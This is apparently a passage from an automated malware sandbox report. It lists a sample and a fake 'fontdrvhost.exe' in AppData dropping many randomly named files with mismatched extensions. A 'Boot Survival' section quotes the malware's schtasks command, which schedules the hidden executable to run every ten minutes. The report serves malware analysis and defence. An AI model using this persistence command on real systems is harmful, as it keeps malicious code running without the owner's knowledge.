Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wsOrhbIJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hsmnhNDB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ORiFVhtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZtZwWUdP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CQeYyQPa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zzDSBAiP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ikDUDecv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WuogHSdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YOQFKOOU.log Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\DnshUSLJ.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tAOrkGQb.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\SKewgrff.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\IbKgwPay.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\zsrQNmVQ.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\pJXAdKPi.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XxwvJouT.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\wHLAFYKX.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\lThKWNPp.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\dpYUmTzI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tqrrAUxf.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tIxJOpqh.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\qxbJOXLg.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\avWEvUWS.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\RMCoLrQk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\PCgnLZlk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\xvPIrmGV.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\nHlSHaLn.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XFfNnXVZ.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\NWMxEuQr.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\THFECrua.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LtTWIWgh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MPlPWbPk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CgRzmzKC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kUpuTdpn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\blWejAjG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RCCOzYeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ylQifTUJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hezDLgou.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NMMXsbef.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uvZrYWTP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cixmEAyA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KWVhlfdm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pzYaRqdW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YsHvxEyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oTDkKMId.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KOmOGvDg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kdNuDPIk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\auteTnDC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMaOjKxV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IiRYzRio.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WzsNMHNJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\gmudUmpb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KjbhtTTT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CGTrJaEm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sXAbZyyE.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aLYWFcdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ORiFVhtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\phJkSByL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fyqViYtd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VPWFywnw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NmOPODYO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fqGCEpSY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OjpXkDnJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ntFcgnCN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dKmMwLxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UbSwNisy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KszgdGmQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CQeYyQPa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\jECTfuuL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aVjDvRpd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RraOLYZw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zfzIrCEh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWzHsBqG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pMKkuPam.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\feqUKmVF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WvXEaKPX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MMDorhKp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CdkYHFFH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mbeUnBPt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cnAeDqUL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zntiAIEO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XsyMwKeS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xHZssejW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fvxnZIOH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TCIWpNeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DACRVJoK.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uRiBlhjd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RRcFiATg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\yEAAOeyR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oQWKeSDj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YOQFKOOU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OgxpbmIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uJzjHyIX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PEqxAxdY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWXhQVXq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wsOrhbIJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJvbxzCb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dabMNWxu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MTLhtkSf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CkrRJHNx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ldamqVhj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZklVGaxA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IdUqmnRm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inkviYhq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzFFzMmI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GspafaHt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\maCuLVwe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UOaorzbP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JavyIngh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\BxnIYuRz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ifAdEpGk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zldaSYtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hRSCUTxn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YnJNkaiG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xOrrZDRn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SdGfOIqy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JAxqeOaQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zReaumVj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiKKKJQB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iKNvbzqU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZbufrXkm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GPSaXBQY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xgyKnYKq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\msUTDNPI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MHvzAhUM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CTQIQVae.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kMzdwiuP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aYVnMXzh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QpCXcuuA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GGiHtSpS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ouGCZwUD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fLnmpTPV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OEWHVhjH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DQsQlVoZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mJblSiJK.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WAZwZzli.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aFyNQRuY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SbqYhYfr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IsWIxvZJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qguCdZEu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YUSxJEkf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NgoGZspx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TYRgCYum.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sihlzJJp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iANVPgEI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YMjefUJa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WgOpYqoh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KnZYovDz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lCADkPID.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QfCxRbIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rudcNvNr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WYfWtHNc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ELDRalsN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rmtKjMmm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iJlVzTXF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YVGePHcW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HlvZPcYC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bAJNFhyM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TWBYVoif.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMfXVWDe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AFOsBjYP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zzDSBAiP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hsmnhNDB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XEIwxBIS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wOXBumXW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\eCwwaQCH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TORFqFIZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JfyqGcCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sYhLnqXd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ikDUDecv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YBjETBXN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HuSZzPsz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\piqUgtXk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fzXEwQRC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ULtOMFWU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DEcjsSrF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sQxsIGwX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aABfDneW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ipFMCTyG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RnzHiPIs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pntLeisv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VWGgLdif.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EOpBrqDR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mCNvXUiC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TlbPEPXm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zTojkKNX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZtZwWUdP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OemrfNDp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FvSbvlyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uHokLZDZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LovAYRCw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zuGjoWSN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inpEUjnz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzKOkXsR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HxFJRUCD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiEMTywj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fuaVjmBB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OnJqPAWm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JvAHRkKP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\COTaDrJc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lHCvjEeO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bYjfzcZg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QkEpPQey.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IHwzgXOR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rAfUMkjC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OzZYIDTF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EQFIYaOX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJodFojJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dbVNVLdb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AaPSReOe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rrvChBIx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hJcmyZDP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PwAgeDiA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xkYbKhNl.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WuogHSdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MLVQXpXH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DdBAnNSZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uztLDTCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kQZvTrxL.log Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
